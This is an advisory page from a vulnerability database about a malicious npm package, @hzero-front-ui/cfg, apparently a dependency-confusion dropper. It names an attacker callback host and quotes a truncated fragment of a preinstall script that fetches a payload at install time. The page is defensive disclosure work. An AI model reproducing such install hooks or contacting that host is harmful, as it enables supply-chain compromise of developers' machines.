VDB

GCVE-110-OSM-2026-10549

GCVE-110-OSM-2026-10549
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published August 13, 2026
This looks like a dependency-confusion dropper uploaded by a pentest-style publisher: the version is artificially inflated to 99.99.99, the account is brand new, and the package has no repository while being named like an internal namespace. The decisive indicator is the preinstall script in package.json that references a callback host, `pkgsub.callback.m0chan.co.uk`, with a fetched payload URL containing `$b64`, which is consistent with an attacker-controlled install-time fetch. That attacker model is a compromise of internal-package trust, aiming to get code executed during dependency resolution rather than to provide a legitimate library. The empty `index.js` export reinforces that the real behavior lives in install-time logic, not the module entrypoint. ENTRY index.js (main: index.js) - Preinstall Script in package.json: ""preinstall": "b64=$(printf '%s' \"" DESTINATION - 2 fetched-payload (urls, domains) (values recorded in verified_iocs) ADDITIONAL FINDINGS - Brand New Package - Very New NPM Publisher Account

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@hzero-front-ui/cfgall (affected)

References

advisory
vendor

Browse GCVE Records

3,587 records in the GCVE database · Updated September 5, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›